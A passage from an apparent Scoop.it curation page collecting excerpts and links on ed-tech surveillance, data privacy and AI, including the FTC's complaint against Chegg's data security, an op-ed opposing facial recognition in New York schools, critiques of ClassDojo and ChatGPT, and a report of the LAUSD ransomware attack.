  • Data security requirements. ADPPA requires entities to adopt reasonable data security practices and procedures that correspond with an entity’s size and activities, as well as the sensitivity of the data involved. Strong data security standards strengthen national security by protecting the personal data that has been collected and ensuring that data is deleted after it is no longer needed for the purpose for which it was collected. 
  • Transparency regarding data practices with foreign adversaries. ADPPA requires entities to include provisions in their privacy policies disclosing whether any data collected by entity is transferred to, processed in, stored in, or otherwise accessible to China, Russia, Iran, or North Korea. This means that any app using a Chinese cloud provider who would have similar obligations to the Chinese government regarding data access and disclosure as there is concern about TikTok having would have to disclose that connection.  

Simply forcing a ban or divestiture on TikTok in the U.S. without broader privacy rules will not solve the core national security concerns of data collection and exploitation by foreign governments nor will it do anything to change the data collection practices by the millions of other apps whose business practices pose similar national security issues. The lack of a U.S. privacy law means that the Chinese government can purchase a vast array of Americans’ personal data, either from the new owners of TikTok or from any one of the U.S. companies collecting and selling the same data points from users. These concerns would be more effectively addressed by the passage of a strong, comprehensive U.S. privacy law."  

 

For original post, please visit:

https://epic.org/tiktok-is-not-the-only-problem/ 

No comment yet.
Rescooped by Roxana Marachi, PhD from Social Impact Bonds, "Pay For Success," Results-Based Contracting, and Blockchain Digital Identity Systems
July 22, 2023 9:05 PM
Scoop.it!

On Impact Investing, Digital Identity and the United Nation's Sustainable Development Goals // WrenchInTheGears

By Alison McDowell, wrenchinthegears.com 
"This is a presentation prepared for One Ocean, Many Waves Cross-movement Summit on the occasion of the 2020 UN Conference on the Status of Women, which was cancelled due to the pandemic, and thus presented online instead. The topic is the ways in which the Sustainable Development Goals underpin predatory "pay for success" human capital investment markets."

 

https://www.youtube.com/watch?v=QqFTyYhfNQs 

No comment yet.
Scooped by Roxana Marachi, PhD
February 10, 2023 5:23 PM
Scoop.it!

ChatGPT is a data privacy nightmare. If you’ve ever posted online, you ought to be concerned // The Conversation 

ChatGPT is a data privacy nightmare. If you’ve ever posted online, you ought to be concerned // The Conversation  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"ChatGPT is fueled by our intimate online histories. It’s trained on 300 billion words, yet users have no way of knowing which of their data it contains."...

 

For full post, please visit:

https://theconversation.com/chatgpt-is-a-data-privacy-nightmare-if-youve-ever-posted-online-you-ought-to-be-concerned-199283 

No comment yet.
Scooped by Roxana Marachi, PhD
July 24, 2022 12:06 PM
Scoop.it!

Killer Apps for the Classroom? Developing Critical Perspectives on ClassDojo and the ‘Ed-tech’ Industry // Williamson, B. (2019). Journal of Professional Learning 

Killer Apps for the Classroom? Developing Critical Perspectives on ClassDojo and the ‘Ed-tech’ Industry // Williamson, B. (2019). Journal of Professional Learning  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Ben Williamson

" The digital behaviour-monitoring app ClassDojo has become one of the most popular educational technologies in the world. Widely adopted by teachers of young children in Australia, Europe and North America since its initial launch in 2011, ClassDojo is now attracting critical attention from researchers and the media too. These critical perspectives are importantly illuminating how popular classroom technologies such as ClassDojo and the wider ‘ed-tech’ market are involved in reshaping the purposes and practices of education at an international scale. They are global, networked, demanding of teachers’ labour, and based on the extraction of digital information from schools—all raising significant questions for critical interrogation.

The purpose of engaging with ClassDojo critically is to challenge some of the taken-for-granted assumptions used to justify and promote the rollout and uptake of new edtech products and services in classrooms. Being critical does not necessarily imply militant judgement, but instead careful inquiry into the origins, purposes and implications of new technologies, their links to education policies, and the practices they shape in schools. What do these new technologies ultimately mean for education looking to the future?

Much contemporary education policy and practice tends to be fixated on research that solves problems and offers evidence of ‘what works’ (Biesta, Filippakou, Wainwright & Aldridge, 2019). One of the most important aims of educational research, however, is to identify problems:

Educational research that operates in a problem‐posing rather than a problem‐solving mode is … itself a form of education as it tries to change mindsets and common perceptions, tries to expose hidden assumptions, and tries to engage in ongoing conversations about what is valuable and worthwhile in education and society more generally. (Biesta et al, 2019, p.3)... 

For full publication, please visit:

https://cpl.asn.au/print/3498 

No comment yet.
Scooped by Roxana Marachi, PhD
July 11, 2022 5:45 PM
Scoop.it!

Why We Need to Bust Some Myths about AI // Leufer (2020) // Cell Press

https://www.cell.com/patterns/pdf/S2666-3899(20)30165-3.pdf 

No comment yet.
Scooped by Roxana Marachi, PhD
November 1, 2022 4:05 PM
Scoop.it!

FTC Accuses Chegg Homework Help App of ‘Careless’ Data Security // The New York Times

FTC Accuses Chegg Homework Help App of ‘Careless’ Data Security // The New York Times | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Natasha Singer

"The Federal Trade Commission on Monday cracked down on Chegg, an education technology firm based in Santa Clara, Calif., saying the company’s “careless” approach to cybersecurity had exposed the personal details of tens of millions of users.

 

In a legal complaint, filed on Monday morning, regulators accused Chegg of numerous data security lapses dating to 2017. Among other problems, the agency said, Chegg had issued root login credentials, essentially an all-access pass to certain databases, to multiple employees and outside contractors. Those credentials enabled many people to look at user account data, which the company kept on Amazon Web Services’ online storage system.

 

As a result, the agency said, a former Chegg contractor was able to use company-issued credentials to steal the names, email addresses and passwords of about 40 million users in 2018. In certain cases, sensitive details on students’ religion, sexual orientation, disabilities and parents’ income were also taken. Some of the data was later found for sale online.

 

Chegg’s popular homework help app is used regularly by millions of high school and college students. To settle the F.T.C.’s charges, the agency said Chegg had agreed to adopt a comprehensive data security program.

 

In a statement, Chegg said data privacy was a top priority for the firm and that the company had worked with the F.T.C. to reach a settlement agreement. The company said it currently has robust security practices, and that the incidents described in the agency’s complaint had occurred more than two years ago. Only a small percentage of users had provided data on their religion and sexual orientation as part of a college scholarship finder feature, the company said in the statement.

“Chegg is wholly committed to safeguarding users’ data and has worked with reputable privacy organizations to improve our security measures and will continue our efforts,” the statement said.

 

The F.T.C.’s enforcement action against Chegg, a prominent industry player, amounts to a warning to the U.S. education technology industry.

 

Since the early days of the pandemic in 2020, the education technology sector has enjoyed a surge in customers and revenue. To enable remote learning, many schools and universities rushed to adopt digital tools like exam-proctoring software, course management platforms and video meeting systems.

 
Students and their families, too, turned in droves to online tutoring services and study aids like math apps. Among them, Chegg, which had a market capitalization of $2.7 billion at the end of trading on Monday, reported annual revenues of $776 million for 2021, an increase of 20 percent from the previous year.
 

Some online learning systems proved so useful that many students, and their educational institutions, continued to use the tools even after schools and colleges returned to in-person teaching.

But the fast growth of digital learning tools during the pandemic also exposed widespread flaws.

 

Many online education services record, store and analyze a trove of data on students’ every keystroke, swipe and click — information that can include sensitive details on children’s learning challenges or precise locations. Privacy and security experts have warned that such escalating surveillance may benefit companies more than students.

In March, Illuminate Education, a leading provider of student-tracking software, reported a cyberattack on certain company databases. The incident exposed the personal information of more than a million current and former students across dozens of districts in the United States — including New York City, the nation’s largest public school system.


In May, the F.T.C. issued a policy statement saying that it planned to crack down on ed tech companies that collected excessive personal details from schoolchildren or failed to secure students’ personal information.


The F.T.C. has a long history of fining companies for violating children’s privacy on services like YouTube and TikTok. The agency is able to do so under a federal law, the Children’s Online Privacy Protection Act, which requires online services aimed at children under 13 to safeguard youngsters’ personal data and obtain parental permission before collecting it.


But the federal complaint against Chegg represents the first case under the agency’s new campaign focused specifically on policing the ed-tech industry and protecting student privacy. In the Chegg case, the homework help platform is not aimed at children, and the F.T.C. did not invoke the children’s privacy law. The agency accused the company of unfair and deceptive business practices.

Chegg was founded in 2005 as a textbook rental service for college students. Today it is an online learning giant that rents e-textbooks.

 

But it is most known as a homework help platform where, for $15.95 per month, students can find ready answers to millions of questions on course topics like relativity or mitosis. Students may also ask Chegg’s online experts to answer specific study or test questions they have been assigned.

Teachers have complained that the service has enabled widespread cheating. Students even have a nickname for copying answers from the platform: “chegging.”

Chegg’s privacy policy promised users that the company would take “commercially reasonable security measures to protect” their personal information. Chegg’s scholarship finder service, for instance, collected information like students’ birth dates as well as details on their religion, sexual orientation and disabilities, the F.T.C. said.

 

But regulators said the company failed to use reasonable security measures to protect user data, even after a series of security lapses that enabled intruders to gain access to sensitive student data and employees’ financial information.

As part of the consent agreement proposed by the F.T.C., Chegg must provide security training to employees and encrypt user data. Chegg must also give consumers access to the personal information it has collected about them — including any precise location data or persistent identifiers like IP addresses — and enable users to delete their records.

Other online learning services may also hear from regulators. The F.T.C. disclosed in July that it was pursuing a number of nonpublic investigations into ed tech providers.

“Chegg took shortcuts with millions of students’ sensitive information,” Samuel Levine, the director of the agency’s Bureau of Consumer Protection, said in a news release on Monday. “The commission will continue to act aggressively to protect personal data.”

 

Natasha Singer is a business reporter covering health technology, education technology and consumer privacy. @natashanyt"

 

For original article, please visit: 

https://www.nytimes.com/2022/10/31/business/ftc-chegg-data-security-legal-complaint.html 

No comment yet.
Scooped by Roxana Marachi, PhD
October 29, 2022 1:39 PM
Scoop.it!

Commentary: Keep facial recognition out of New York schools // Arya and Loshkajian (2022), Times Union 

Commentary: Keep facial recognition out of New York schools // Arya and Loshkajian (2022), Times Union  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Mahima Arya and Nina Loshkajian

"In 2020, New York became a national civil rights leader, the first state in the country to ban facial recognition in schools. But almost two years later, state officials are examining whether to reverse course and give a passing grade to this failing technology.

Wasting money on biased and faulty tech will only make schools a harsher, more dangerous environment for students, particularly students of color, LGBTQ+ students, immigrant students, and students with disabilities. Preserving the statewide moratorium on biometric surveillance in schools will protect our kids from racially biased, ineffective, unsecure and dangerous tech.

 

Biometric surveillance depends on artificial intelligence, and human bias infects AI systems. Facial recognition software programmed to only recognize two genders will leave transgender and nonbinary individuals invisible. A security camera that learns who is “suspicious looking” using pictures of inmates will replicate the systemic racism that results in the mass incarceration of Black and brown men. Facial recognition systems may be up to 99 percent accurate on white men, but can be wrong more than one-in-three times for some women of color.

 
 

What’s worse, facial recognition technology has even higher inaccuracy rates when used on students. Voice recognition software, another widely known biometric surveillance tool, echoes this pattern of poor accuracy for those who are nonwhitenon-male, or young.

The data collected by biometric surveillance technologies is vulnerable to a variety of security threats, including hacking, data breaches and insider attacks. This data – which includes scans of facial features, fingerprints, and irises – is unique and highly sensitive, making it a valuable target for hackers and, once compromised, impossible to reissue like you would a password or PIN. Collecting and storing biometric data in schools, which tend to have inadequate cybersecurity practices, puts children at great risk of being tracked and targeted by malicious actors. There is absolutely no need to expose children to these privacy and safety risks.

 

The types of biometric surveillance technology being marketed to schools are widely recognized as dangerous. One particularly controversial vendor of facial recognition technology, Clearview AI, has reportedly tested or implemented its systems in more than 50 educational institutions across 24 states. Other countries have started to appreciate the threat Clearview poses to privacy, with Australia recently ordering it to cease its scraping of images. And last year, privacy groups in Austria, France, Greece, Italy and the U.K. filed legal complaints against Clearview. All while the company continues to market its products to schools in the U.S.

 

As the world begins to wake up to the risks of using facial recognition, New York should not make the mistake of allowing young kids to be subjected to its harms. Additionally, one study found that CCTV systems in U.K. secondary schools led many students to suppress their expressions of individuality and alter their behavior. Normalizing biometric surveillance will bring about a bleak future for kids at schools across the country.

New York shouldn’t waste money on tech that criminalizes and harms young people. Most school shootings are committed by current students or alumni of the school in question, faces of whom would not be flagged as suspicious by facial recognition systems. And even if the technology were to flag a real potential perpetrator of violence, given the speed at which most school shootings usually come to an end, it is unlikely that law enforcement would be notified and able to arrive to the scene in time to prevent such horrendous acts.

Students, parents and stakeholders have the opportunity to submit a brief survey to let the State Education Department know that they want facial recognition and other biased AI out of their schools, not just temporarily but permanently. New York must at least extend the moratorium on biometric surveillance in schools, and ultimately should put an end to the use of such problematic technology altogether."


Mahima Arya is a computer science fellow at the Surveillance Technology Oversight Project (S.T.O.P.), a human rights fellow at Humanity in Action, and a graduate of Carnegie Mellon University. Nina Loshkajian is a D.A.T.A. Law Fellow at S.T.O.P. and a graduate of New York University School of Law.

 

https://www.timesunion.com/opinion/article/Commentary-Keep-facial-recognition-out-of-New-17523857.php 

No comment yet.
Scooped by Roxana Marachi, PhD
September 6, 2022 9:21 PM
Scoop.it!

Los Angeles Unified, Feds Investigating As Ransomware Attack Cripples IT Systems //  THE Journal 

Los Angeles Unified, Feds Investigating As Ransomware Attack Cripples IT Systems //  THE Journal  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"A ransomware attack over Labor Day weekend brought to a standstill the online systems of Los Angeles Unified School District, the second-largest K–12 district in the country with about 640,000 students, LAUSD officials confirmed this morning in a statement on its website.""

 

https://thejournal.com/articles/2022/09/06/los-angeles-unified-feds-investigating-as-ransomware-attack-cripples-it-systems.aspx?s=the_nu_060922&oly_enc_id=8831J2755401H5M 

No comment yet.